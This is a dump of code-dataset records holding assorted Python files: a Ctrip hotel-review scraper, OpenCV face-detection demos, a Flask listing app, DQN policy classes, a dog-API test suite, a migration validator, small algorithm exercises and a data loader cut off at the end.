# if j >= 0:\n # nums1[: j + 1] = nums2[ : j + 1]\n while j >= 0:\n nums1[j] = nums2[j]\n j -= 1","sub_path":"explore/2021/january/Merge_Sorted_Array.2.py","file_name":"Merge_Sorted_Array.2.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"153209379","text":"from selenium import webdriver\nfrom lxml import etree\nimport time\nimport re\nfrom bs4 import BeautifulSoup\nimport json\nclass_name = ['dt-color8 dt-fn12', 'm110' ,'dt-color3', 'dt-color8']\n# 根据css文件的类名来生成不同xml字段,因为每次加载出来的网页中评论总数的位置有所变化\ndef get_hotel_commnet_url(hotel_url): # get_hotel_comment_url 获取该酒店的评论地址\n hotel_id_re=re.compile('.*/(\\d+).html')\n id = None\n for x in hotel_id_re.findall(hotel_url):\n id = x\n break\n if id is not None:\n return 'http://m.ctrip.com/webapp/hotel/hoteldetail/dianping/'+id+'.html?roomtype=&opr=&fr=detail&daylater=0&days=1&treename='\ndef get_commnet_num_xml(num): #根据输入的num尝试生成 获取该酒店的评论总数 的xpath\n xslt_root = etree.XML(\"\"\"\\\n <xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" >\n <xsl:template match=\"/\">\n <comment>\n <xsl:apply-templates select=\"//*[@class='\"\"\" + class_name[num] + \"\"\"']\" mode=\"comment\"/>\n </comment>\n </xsl:template>\n <xsl:template match=\"//*[@class='\"\"\" + class_name[num] + \"\"\"']\" mode=\"comment\">\n <item>\n <num>\n <xsl:value-of select=\".\"/>\n </num>\n </item>\n </xsl:template>\n </xsl:stylesheet>\"\"\")\n return xslt_root\n# 获取评论总数\ndef get_commnet_num(hotel_url):\n driver = webdriver.Chrome(executable_path='C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chromedriver.exe')\n driver.get(url=hotel_url)\n time.sleep(20)\n html = driver.execute_script(\"return document.documentElement.outerHTML\")\n num_re=re.compile('(\\d+)条[评论|点评]{0,1}')\n count=0\n for i in range(0, len(class_name)):\n xslt_root = get_commnet_num_xml(i)\n transfrom = etree.XSLT(xslt_root)\n doc = etree.HTML(html)\n result_tree = transfrom(doc)\n for x in num_re.findall(str(result_tree)):\n if x is not None:\n count = x\n break\n driver.close()\n return count\n# 获取所有评论,先获取评论总数,再根据评论总数决定下滑次数,将所有评论加载出来,再解析所有评论\ndef get_all_comment(hotel_comment_url, comment_count ,output_file):\n driver = webdriver.Chrome(executable_path='C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chromedriver.exe')\n xslt_root=etree.XML(\"\"\"\\\n <xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" >\n <xsl:template match=\"/\">\n <comment>\n <xsl:apply-templates select=\"//*[@class='dn hotel-t-b-border']\" mode=\"comment\"/>\n </comment>\n </xsl:template>\n <xsl:template match=\"//*[@class='dn hotel-t-b-border']\" mode=\"comment\">\n <item>\n <information>\n <xsl:copy-of select=\".\"/>\n </information>\n </item>\n </xsl:template>\n </xsl:stylesheet>\n \"\"\")\n driver.get(url=hotel_comment_url)\n time.sleep(10)\n for i in range(0,int(int(comment_count)/10+10)):\n driver.execute_script(\"scrollBy(0,3000)\")\n time.sleep(1)\n html = driver.execute_script(\"return document.documentElement.outerHTML\")\n transfrom = etree.XSLT(xslt_root)\n doc = etree.HTML(html)\n result_tree = transfrom(doc)\n bs4Oj = BeautifulSoup(str(result_tree),\"lxml\")\n list=bs4Oj.find_all(\"div\",{\"class\" : \"dn hotel-t-b-border\"})\n comment_detail_re=re.compile('.*?<strong itemprop=\"ratingValue\">(.*?)</strong>.*?<div class=\"hotel-cell-num\"><p><span class=\"fr hotel-arr.*?>(.*?)</span>(.*?)</p>.*?<em class=\"item .*?>(.*?)</em>.*?<span class=\"user-level-base.*?\">(.*?)</span>.*?<time itemprop=\"datePublished\">(.*?)</time>.*?<p class=\"tree-ellips-line6.*?>(.*?)</p>')\n for x in list:\n x = str(x).replace('\\n', '')\n for y in comment_detail_re.findall(x):\n d ={'score': y[0], 'room_type': y[1], 'name': y[2], 'tour_type': y[3], 'grade': y[4], 'time': y[5], 'comment': y[6]}\n output_file.write(str(d)+'\\n')\n driver.close()\ndef test():\n line = '{\"url\": \"http://m.ctrip.com/html5/hotel/hoteldetail/433114.html\", \"title\": \"北京和平里宾馆\"}'\n json_data = json.loads(line)\n output_file = open(\"hotel_commet.txt\", \"w\", encoding='utf-8')\n hotel_url = json_data['url']\n hotel_comment_url = get_hotel_commnet_url(hotel_url)\n comment_count = get_commnet_num(hotel_url)\n print(comment_count)\n # print('评论地址:' + hotel_comment_url + \",评论总数:\" + str(comment_count))\n output_file.write('酒店名称:'+str(json_data['title'])+\",酒店地址:\"+str(json_data['url'])+\",酒店评论总数:\"+str(comment_count)+\"\\n\")\n get_all_comment(hotel_comment_url, 10 ,output_file)\n output_file.close()\n","sub_path":"a_hotel_get_comment.py","file_name":"a_hotel_get_comment.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"372641818","text":"import numpy as np\nimport cv2\n\n\ndef main():\n # show_camera_image()\n # find_face_on_image()\n extract_face_from_camera()\n\n\ndef show_camera_image():\n cap = cv2.VideoCapture(0)\n\n while (True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # Our operations on the frame come here\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # Display the resulting frame\n cv2.imshow('frame', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # When everything done, release the capture\n cap.release()\n cv2.destroyAllWindows()\n\n\n'''\n Use cascadeClassifier to extract face, find more details in:\n https://docs.opencv.org/3.3.0/d7/d8b/tutorial_py_face_detection.html\n'''\n\n\ndef find_face_on_image():\n # cap = cv2.VideoCapture(0)\n # ret, img = cap.read()\n # img = cv2.imread('resources/face_demo.jpg')\n img = cv2.imread('resources/full_body_zh1.jpg')\n face_cascade = cv2.CascadeClassifier(\n '/usr/local/Cellar/opencv/3.4.0_1/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')\n eye_cascade = cv2.CascadeClassifier(\n '/usr/local/Cellar/opencv/3.4.0_1/share/OpenCV/haarcascades/haarcascade_eye.xml')\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\n roi_gray = gray[y:y + h, x:x + w]\n roi_color = img[y:y + h, x:x + w]\n eyes = eye_cascade.detectMultiScale(roi_gray)\n for (ex, ey, ew, eh) in eyes:\n cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 2)\n cv2.imshow('img', img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\ndef extract_face_from_camera():\n cap = cv2.VideoCapture(0)\n while (True):\n ret, frame = cap.read()\n\n face_cascade = cv2.CascadeClassifier(\n '/usr/local/Cellar/opencv/3.4.0_1/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n face_images = [];\n for (x, y, w, h) in faces:\n face_images.append(frame[y:y + h, x:x + w]);\n\n for i in range(len(face_images)):\n cv2.imwrite('tmp/test{}.jpg'.format(i), face_images[i])\n\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"demos/camera_reader_demo.py","file_name":"camera_reader_demo.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"304259425","text":"from flask import Flask, render_template, redirect\r\nfrom flask.helpers import url_for\r\nfrom forms import *\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_bootstrap import Bootstrap\r\nfrom flask_moment import Moment\r\nfrom flask_login import LoginManager, current_user, login_required\r\nfrom werkzeug.utils import secure_filename\r\nimport os\r\nimport uuid\r\nfrom models import db,user,posts,items\r\nfrom sqlalchemy.exc import SQLAlchemyError\r\n\r\n\r\n\r\nIMAGE_UPLOAD_FOLDER = '/static/img'\r\nEXTENSIONS = set(['jpg', 'jpeg'])\r\n\r\napp = Flask(__name__)\r\napplication = app\r\napp.config['SECRET_KEY'] = 'hard to guess string'\r\napp.config['SQLALCHEMY_DATABASE_URI'] ='sqlite:///posts.db'\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\ndb.init_app(app)\r\n\r\n\r\nfrom auth import auth as auth_blueprint\r\napp.register_blueprint(auth_blueprint)\r\n\r\nbootstrap = Bootstrap(app)\r\nmoment = Moment(app)\r\nlogin_manager = LoginManager()\r\nlogin_manager.login_view = 'auth.login'\r\nlogin_manager.init_app(app)\r\nwith app.app_context():\r\n db.create_all()\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n return user.query.get(int(user_id))\r\n\r\n@app.route('/update/<int:id>', methods=['GET', 'POST'])\r\ndef update(id):\r\n old_post = posts.query.get(id)\r\n update_form = UpdateForm(title=old_post.title, body=old_post.body,price=old_post.price,pic=old_post.pic)\r\n \r\n if update_form.validate_on_submit():\r\n\r\n old = posts.query.get_or_404(id)\r\n old.title = update_form.title.data\r\n old.body = update_form.body.data\r\n old.price = update_form.price.data\r\n pic = update_form.pic.data\r\n uuid_filename = str(uuid.uuid4())\r\n pic.save(os.path.join(\r\n app.root_path, 'static/img', uuid_filename\r\n ))\r\n old.pic = uuid_filename\r\n print(update_form.title.data)\r\n print(update_form.body.data)\r\n print(update_form.price.data)\r\n print(uuid_filename)\r\n\r\n try:\r\n db.session.commit()\r\n return redirect(url_for('index'))\r\n except:\r\n return \"Update error\"\r\n return render_template('update.html', update_form=update_form )\r\n\r\n@app.route('/add_to_cart/<int:id>', methods=['GET'])\r\ndef add_to_cart(id):\r\n already_in = items.query.filter_by(post_id=id).all()\r\n if already_in:\r\n return redirect(url_for('index'))\r\n db_entry = items(post_id=id,email=current_user.email)\r\n print(db_entry)\r\n try:\r\n db.session.add(db_entry)\r\n db.session.commit()\r\n return redirect(url_for('index'))\r\n\r\n except SQLAlchemyError as e:\r\n error = str(e.__dict__['orig'])\r\n return error\r\n\r\n\r\n@app.route('/delete_from_cart/<int:id>', methods=['GET'])\r\ndef delete_from_cart(id):\r\n deleted_post = items.query.filter_by(post_id=id).first()\r\n try:\r\n db.session.delete(deleted_post)\r\n db.session.commit()\r\n return redirect(url_for('index'))\r\n except SQLAlchemyError as e:\r\n error = str(e.__dict__['orig'])\r\n return error\r\n\r\ndef cart_list():\r\n return items.query.filter_by(email=current_user.email).all()\r\n\r\n\r\n@app.route('/delete/<int:id>', methods=['GET', 'POST'])\r\ndef delete(id):\r\n\r\n deleted_post = posts.query.get_or_404(id)\r\n in_cart = items.query.filter_by(post_id=id).first()\r\n if in_cart:\r\n try:\r\n db.session.delete(in_cart)\r\n except:\r\n return \"Delete error\"\r\n try:\r\n db.session.delete(deleted_post)\r\n db.session.commit()\r\n return redirect(url_for('index'))\r\n except:\r\n return \"Delete error\"\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n if not current_user.is_authenticated:\r\n return render_template(\"home.html\")\r\n\r\n title = body = price = pic = None\r\n post_form = PostForm()\r\n if post_form.validate_on_submit():\r\n title = post_form.title.data\r\n body = post_form.body.data\r\n price = post_form.price.data\r\n pic = post_form.pic.data\r\n uuid_filename = str(uuid.uuid4())\r\n pic.save(os.path.join(\r\n app.root_path, 'static/img', uuid_filename\r\n ))\r\n \r\n db_entry = posts(title = title, body = body, price = price, pic = uuid_filename, author_username=current_user.username, author_email=current_user.email)\r\n try:\r\n db.session.add(db_entry)\r\n db.session.commit()\r\n except:\r\n return \"Database error\"\r\n else :\r\n print(post_form.errors)\r\n items_list = [item.post_id for item in cart_list()]\r\n return render_template('index.html', post_form=post_form , posts_table=posts.query.order_by(posts.id.desc()).all(), current_user=current_user,cart_list =items_list, len_cart_list = len(items_list) )\r\n\r\n\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"517029086","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\n\n\n\ndef magic_by_pd(path_per, path_roa):\n # 파일경로\n file_path_per = path_per\n\n # 파일읽기\n # per_data = pd.read_excel(file_path, sheet_name='PER', index_col=0)\n per_data = pd.read_csv(file_path_per, sep='\\t', index_col=0)\n\n # 필터링\n filtered_per = per_data[per_data['PER'] > 0]\n\n # 정렬\n sorted_per = filtered_per.sort_values(by='PER')\n\n # 랭킹\n sorted_per['PER랭킹'] = sorted_per['PER'].rank()\n\n # sorted_per\n \n # 파일경로\n file_path_roa = path_roa\n\n # 파일읽기\n roa_data = pd.read_csv(file_path_roa, sep='\\t', index_col=0)\n\n # 필터링\n filtered_roa = roa_data.dropna()\n filtered_roa.columns = ['ROA']\n\n # 정렬\n sorted_roa = filtered_roa.sort_values(by='ROA', ascending=False)\n\n # 랭킹\n sorted_roa['ROA랭킹'] = sorted_roa['ROA'].rank(ascending=False)\n\n # sorted_roa\n \n # 병합\n total_df = pd.merge(sorted_per, sorted_roa, how='inner', left_index=True, right_index=True)\n\n total_df['랭킹 합계'] = total_df['PER랭킹'] + total_df['ROA랭킹']\n\n sorted_df = total_df.sort_values(by='랭킹 합계')\n\n sorted_df['종합 랭크'] = sorted_df['랭킹 합계'].rank()\n\n # sorted_df\n \n return sorted_df\n","sub_path":"MagicQuant.py","file_name":"MagicQuant.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"426400074","text":"import tensorflow as tf\nfrom tensorflow.python.keras import Sequential\nfrom tensorflow.python.keras.engine import Layer\nfrom tensorflow.python.keras.layers import Dense, Conv2D, Flatten\n\n\nclass CNNFeatures(Sequential):\n def __init__(self):\n \"\"\"\n 'Human-level control through deep reinforcement learning':\n The first hidden layer convolves 32 filters of 8 x 8 with stride 4 with the input image and applies a rectifier nonlinearity.\n The second hidden layer convolves 64 filters of 4 x 4 with stride 2, again followed by a rectifier nonlinearity.\n This is followed by a third convolutional layer that convolves 64 filters of 3 x 3 with stride 1 followed by a rectifier.\n The final hidden layer is fully-connected and consists of 512 rectifier units.\n The output layer is a fully-connected linear layer with a single output for each valid action.\n \"\"\"\n layers = [\n CheckCNNObsNormalized(),\n Conv2D(filters=32, kernel_size=8, strides=4, activation='relu'),\n Conv2D(filters=64, kernel_size=4, strides=2, activation='relu'),\n Conv2D(filters=64, kernel_size=3, strides=1, activation='relu'),\n Flatten(),\n Dense(units=512, activation='relu')\n ]\n super().__init__(layers)\n\n\nclass CheckCNNObsNormalized(Layer):\n def call(self, obs, **kwargs):\n assert obs.shape.as_list() == [None, 84, 84, 4]\n asserts = [tf.assert_greater_equal(obs, 0.0), tf.assert_less_equal(obs, 1.0)]\n with tf.control_dependencies(asserts):\n obs = tf.identity(obs)\n return obs\n\n\nclass MLPFeatures(Sequential):\n def __init__(self):\n layers = [\n Dense(64, 'relu'),\n Dense(64, 'relu'),\n ]\n super().__init__(layers)\n\n\nclass Policy(Sequential):\n def __init__(self, n_actions, features_cls, dueling):\n features_model = features_cls()\n if dueling:\n layers = [\n features_model,\n DuelingQs(n_actions)\n ]\n else:\n layers = [\n features_model,\n Dense(n_actions, activation=None)\n ]\n super().__init__(layers)\n\n\nclass DuelingQs(Layer):\n def __init__(self, n_actions):\n super().__init__()\n self.n_actions = n_actions\n self.v_layer = Dense(1, activation=None)\n self.advs_layer = Dense(n_actions, activation=None)\n\n def call(self, features, **kwargs):\n v = self.v_layer(features)\n advs = self.advs_layer(features)\n\n assert v.shape.as_list() == [None, 1]\n assert advs.shape.as_list() == [None, self.n_actions]\n\n mean_adv = tf.reduce_mean(advs, axis=1, keepdims=True)\n centered_advs = advs - mean_adv\n qs = v + centered_advs\n\n assert mean_adv.shape.as_list() == [None, 1]\n assert centered_advs.shape.as_list() == [None, self.n_actions]\n assert qs.shape.as_list() == [None, self.n_actions]\n\n return qs\n","sub_path":"dqn/policies.py","file_name":"policies.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"139314237","text":"from manimlib.imports import *\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\n\n\nclass Model(nn.Module):\n def __init__(self, D_in: int, H: int, D_out: int) -> None:\n super().__init__()\n self.H = H\n self.linear1 = torch.nn.Linear(D_in, H)\n self.linear2 = torch.nn.Linear(H, D_out)\n\n def forward(self, x, nb_relu_dim=-1):\n z = self.linear1(x)\n if nb_relu_dim == self.H or nb_relu_dim == -1:\n h = F.relu(z)\n elif nb_relu_dim == 0:\n h = z\n else:\n h = torch.cat(F.relu(z[:nb_relu_dim]), z[nb_relu_dim:])\n return self.linear2(h), h, z\n\n\ntorch.manual_seed(8)\nmodel = Model(2, 1, 2)\n\n\ndef rgb2hex(r, g, b):\n r, g, b = int(r * 255), int(g * 255), int(b * 255)\n return \"#{:02x}{:02x}{:02x}\".format(r, g, b)\n\n\nzieger = plt.imread('ziegler.png')\n\nX = torch.randn(1000, 2)\nH = torch.tanh(X)\n\nx_min = -1\nx_max = +1\ncolors = (X - x_min) / (x_max - x_min)\ncolors = (colors * 511).short().numpy()\ncolors = np.clip(colors, 0, 511)\n\ncolors = zieger[colors[:, 0], colors[:, 1]]\n\n\nclass RandomTransform(LinearTransformationScene):\n CONFIG = {\n \"show_basis_vectors\": False,\n \"foreground_plane_kwargs\": {\n \"x_line_frequency\": 1,\n \"y_line_frequency\": 1,\n },\n \"relu\": False\n }\n\n def construct(self):\n points = VGroup(*[\n Dot(2*np.array([point[0], point[1], 0]), color=rgb2hex(*colors[index]),\n radius=0.75*DEFAULT_DOT_RADIUS) for index, point in enumerate(H)\n ])\n self.setup()\n self.play(Write(points))\n self.wait()\n\n self.moving_mobjects += [*points]\n\n self.apply_nonlinear_transformation(self.func, run_time=6)\n self.wait()\n\n if self.relu:\n\n self.apply_nonlinear_transformation(lambda point: list(\n map(lambda x: max(x, 0), point)), run_time=6)\n self.wait()\n\n self.apply_nonlinear_transformation(self.func2, run_time=6)\n self.wait()\n\n\nclass FoldTransform(RandomTransform):\n CONFIG = {\"relu\": True}\n\n def func(self, point):\n x, y, z = point\n inp = torch.tensor(point[:2], dtype=torch.float32)\n y, h, z = model(inp)\n x = z.detach().numpy()\n return 2 * (x * RIGHT)\n\n def func2(self, point):\n x, y, z = point\n inp = torch.tensor(point[:1], dtype=torch.float32)\n y = model.linear2(inp)\n x, y = y.detach().numpy()\n return 2.5 * (x * RIGHT + y * UP)\n","sub_path":"part1/212.py","file_name":"212.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"505372736","text":"#Write a program that takes 5 numbers as an input, puts them into a list, then modifies that list so each element is replaced with its square. (2 becomes 4, 5 becomes 25) and such.\n#(put it on your github, in the / homework folder)\n\n#taken from stackoverflow: https://stackoverflow.com/questions/56920836/how-to-replace-every-element-in-a-given-list-to-its-square-and-not-create-a-new\ndef square_list(list_1):\n for i in range(len(list_1)):\n list_1[i] = list_1[i]**2\n\n\nmy_list = [1, 2, 3, 4, 5]\nsquare_list(my_list)\nprint(my_list)\n","sub_path":"Homework/Homework3.py","file_name":"Homework3.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"535198493","text":"import pytest\nfrom yaml import safe_load\nfrom pprint import pprint\nfrom lib.helper import get_request\nfrom test_data_lib.data import Breeds\nfrom test_data_lib.schema import BreedsSchema\nfrom jsonschema import validate\n\n\n@pytest.fixture(scope=\"module\")\ndef data_setup():\n global data\n\n with open(file=\"./test_data_lib/api_test_data.yaml\") as f:\n data = safe_load(f).get(\"dog_apis\")\n\n\n@pytest.fixture(scope=\"session\", autouse=True)\ndef breeds():\n return Breeds()\n\n\n@pytest.fixture(scope=\"session\", autouse=True)\ndef breeds_schema():\n return BreedsSchema()\n\n\ndef test_get_all_breeds(data_setup, breeds, breeds_schema):\n \"\"\" Return a list of all dog breeds \"\"\"\n\n results, status_code= get_request(url=data.get(\"all_breeds\"))\n assert status_code == 200\n assert results.get(\"message\") == breeds.all_breeds\n validate(instance=results, schema=breeds_schema.all_breeds_schema)\n\n\ndef test_verify_retriever_breed(data_setup):\n \"\"\" Verify that the retriever breed is in the list \"\"\"\n\n results, status_code = get_request(url=data.get(\"all_breeds\"))\n breed = results.get(\"message\").keys()\n assert status_code == 200\n assert \"retriever\" in breed\n\n\ndef test_get_retriever_sub_breeds(data_setup, breeds, breeds_schema):\n \"\"\" Return a list of all retriever sub-breeds \"\"\"\n\n breed_url = data.get(\"sub_breed\", breeds)\n results, status_code = get_request(url=breed_url.format(breed=\"retriever\"))\n assert status_code == 200\n assert results.get(\"message\") == breeds.sub_breeds\n validate(instance=results, schema=breeds_schema.sub_breeds_schema)\n\n\ndef test_get_random_image_golden_retriever(data_setup):\n \"\"\" Return a random image link to a golden retriever image \"\"\"\n\n random_image_url = data.get(\"sub_breed_random_image\")\n results, status_code = get_request(url=random_image_url.format(breed=\"retriever\", sub_breed=\"golden\"))\n assert status_code == 200\n\n\ndef test_cannot_get_sub_breeds(data_setup, breeds, breeds_schema):\n \"\"\" Return a list of all retriever sub-breeds \"\"\"\n\n breed_url = data.get(\"sub_breed\", breeds)\n results, status_code = get_request(url=breed_url.format(breed=\"jack_russel\"))\n assert status_code == 404\n assert results.get(\"message\") == 'Breed not found (master breed does not exist)'\n validate(instance=results, schema=breeds_schema.error_response_schema)\n","sub_path":"tests/test_get_dog_breeds.py","file_name":"test_get_dog_breeds.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"545745646","text":"# Writing Tree Level wise\r\n'''\r\n F\r\n / \\\r\n D J\r\n / \\ / \\\r\n B E G K\r\n / \\ \\\r\n A C I\r\n /\r\n H\r\n\r\nLevel Node\r\n1 F\r\n2 D,J \r\n3 B,E,G,K\r\n4 A,C,I\r\n5 H\r\n\r\nOrder\r\nF,D,J,B,E,G,K,A,C,I,H\r\n\r\n'''\r\n# Code:\r\n\r\nclass Node:\r\n def __init__(self,data):\r\n self.data=data\r\n self.left=self.right=None\r\n\r\ndef LevelOrder(root):\r\n if root is None:\r\n return\r\n l=[]\r\n l.append(root)\r\n while len(l)>0:\r\n temp = l.pop(0)\r\n print(temp.data, end=\" \")\r\n if temp.left:\r\n l.append(temp.left)\r\n if temp.right:\r\n l.append(temp.right)\r\n\r\nroot = Node(\"F\") \r\nroot.left = Node('D')\r\n\r\nroot.right = Node('J')\r\n\r\nroot.left.left = Node('B') \r\nroot.left.right = Node('E')\r\n\r\nroot.right.left = Node('G') \r\nroot.right.right = Node('K')\r\n\r\nroot.left.left.left =Node('A') \r\nroot.left.left.right = Node('C')\r\n\r\nroot.right.left.right = Node('I') \r\nroot.right.left.right.left = Node('H') \r\nprint(\"Level order traversal is \") \r\nLevelOrder(root)\r\n \r\n \r\n","sub_path":"Binary Tree/LevelOrderTraversal.py","file_name":"LevelOrderTraversal.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"397630282","text":"# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\nfrom typing import List\nimport shutil\n\nfrom pre_wigs_validation.enums import ValidationEnforcement, ValidationResult\nfrom pre_wigs_validation.instance import ValidationInstance\nfrom pre_wigs_validation.dataclasses import ValidationOutput\nfrom pre_wigs_validation.utils import check_validation_config\n\nclass ThirdPartySoftware:\n \"\"\"\n Validate that third-party software components which would conflict\n with AMS components have been removed, such as anti-virus clients,\n backup clients, virtualization software, and access management software.\n \"\"\"\n\n validation = \"Third Party Software\"\n enforcement = ValidationEnforcement.REQUIRED\n software_list = [\n \"ma\",\n \"cma\",\n \"aex-bootstrap\",\n \"aex-configure\",\n \"aex-diagnostics\",\n \"aex-env\",\n \"aex-uninstall\",\n \"aex-helper\",\n \"aex-cta\",\n \"pbis\",\n \"domainjoin-cli\",\n \"adinfo\",\n \"adcheck\",\n \"adquery\",\n \"vmware-toolbox-cmd\",\n \"vmware-user\",\n \"realmd\"\n ]\n\n @classmethod\n def validate(\n cls,\n *,\n custom_software_list: List[str] = None,\n enabled: bool = True,\n instance: ValidationInstance,\n ) -> ValidationOutput:\n\n \"\"\"\n Parameters:\n custom_software_list (List[str]): a list of additional blacklisted binaries to search for\n enabled (bool): whether or not to run this validation function\n instance (ValidationInstance): the instance object being validated\n\n Returns:\n ValidationOutput: output of validation\n \"\"\"\n\n if not enabled:\n return ValidationOutput(\n validation=cls.validation,\n result=ValidationResult.NOT_RUN,\n enforcement=cls.enforcement,\n )\n\n pass_message = \"Unwanted software may exist, but nothing was found\"\n fail_message = \"Please remove the following software: \"\n config = check_validation_config(\n default_params=cls.validate.__kwdefaults__, local_params=locals()\n )\n\n # paths = [\"/usr/bin/\", \"/usr/local/bin/\", \"/opt/\", \"/usr/local/\"]\n # empty_message = \"No software provided in config file\"\n\n total_software_list = cls.software_list\n if custom_software_list is not None:\n total_software_list += custom_software_list\n\n failed = False\n for software in total_software_list:\n if shutil.which(software) is not None:\n failed = True\n fail_message += f\"{software}, \"\n\n if not failed:\n return ValidationOutput(\n validation=cls.validation,\n result=ValidationResult.PASS,\n enforcement=cls.enforcement,\n config=config,\n message=pass_message,\n )\n fail_message = fail_message[0:-2]\n return ValidationOutput(\n validation=cls.validation,\n result=ValidationResult.FAIL,\n enforcement=cls.enforcement,\n config=config,\n message=fail_message,\n )\n","sub_path":"wigs-validation-linux/pre_wigs_validation/third_party_software.py","file_name":"third_party_software.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"183505763","text":"from fortran_generator.code_segments import NAME_CONTAINS, NAME_END\n\ndef normal_block_to_string(the_block):\n result = the_block.type_tag + ' ' + the_block.name + '\\n'\n for a_child in the_block.children_before_contains:\n result += a_child.to_string()\n result += NAME_CONTAINS + '\\n'\n for a_child in the_block.children_after_contains:\n result += a_child.to_string()\n result += (NAME_END + ' ' + the_block.type_tag + ' ' + the_block.name + '\\n')\n return result\n\n\n","sub_path":"fortran_generator/code_segments/code_generator.py","file_name":"code_generator.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"491328452","text":"def possible_moves(node, game_map):\r\n \"\"\"\r\n Finds the possible neighbors of a node given the map\r\n \"\"\"\r\n y, x = node\r\n neighs = []\r\n\r\n for i in [(y+1, x), (y-1, x), (y, x+1), (y, x-1)]: # Creates the list of tuples of possible neighbors\r\n if 0 <= i[0] < len(game_map) and 0 <= i[1] < len(game_map[0]): # If it's inside the map, keep it\r\n neighs.append(i) # add it to neighbors\r\n neighs = list(filter(lambda x: game_map[x[0]][x[1]] > -99, neighs)) # filter out walls\r\n return list(neighs) # force it to be a list\r\n\r\n\r\ndef bellman(node, game_map, gamma=0.9):\r\n \"\"\"\r\n This gives you the expected reward for a given best action at a node.\r\n Naively explores the graph with a whatever-first search, returning the best expected value for each choice.\r\n Not a good example of how this really works, mostly just a math demo!\r\n \"\"\"\r\n print(node)\r\n y, x = node # Unpack the node tuple\r\n\r\n if game_map[y][x] == 1 or game_map[y][x] == -1:\r\n print('Reward found!', str(float(game_map[y][x]) * gamma))\r\n return float(game_map[y][x]) * gamma # If it's a reward, return it times gamma\r\n\r\n expected = []\r\n\r\n for neigh in possible_moves(node, game_map):\r\n temp_map = [[point for point in submap] for submap in game_map] # deep copy the stupid map\r\n temp_map[y][x] = -99 # Mark the node on the map\r\n\r\n expected.append(bellman(neigh, temp_map, gamma) * gamma)\r\n print(f\"Back to {node}\")\r\n return float(max(expected)) if len(expected) else -999 # return huge neg if none found\r\n\r\n\r\n# Map visual - https://i.imgur.com/jd1uMVq.png\r\n# Video credit - https://www.youtube.com/watch?v=14BfO5lMiuk\r\ngame_map = [[0, 0, 0, 1],\r\n [0, -99, 0, -1],\r\n [0, 0, 0, 0]]\r\n# Note here that the coordinates are functionally backwards and upside down-\r\n# 0,0 is the top left corner, 3,2 is the bottom right.\r\n\r\nprint(bellman((2, 0), game_map)) # change the point to see how it varies\r\n# I left the print statements so you can see how the graph is explored\r\n","sub_path":"bellman_maze.py","file_name":"bellman_maze.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"235714389","text":"import tensorflow as tf\nimport numpy as np\nimport os\nimport pickle\nimport pandas as pd\nimport pickle\n\nfrom sklearn.model_selection import train_test_split\nfrom keras.preprocessing import sequence\nfrom random import randint\n\ndef transY(array):\n result = 1\n if array[0]==1:\n result = 0\n \n return result\n\ndef LoadData(np_path, path_1, path_2):\n \n A = np.load(np_path+path_1)['arr_0']\n b = np.load(np_path+path_2)['arr_0']\n\n X_train, X_test, 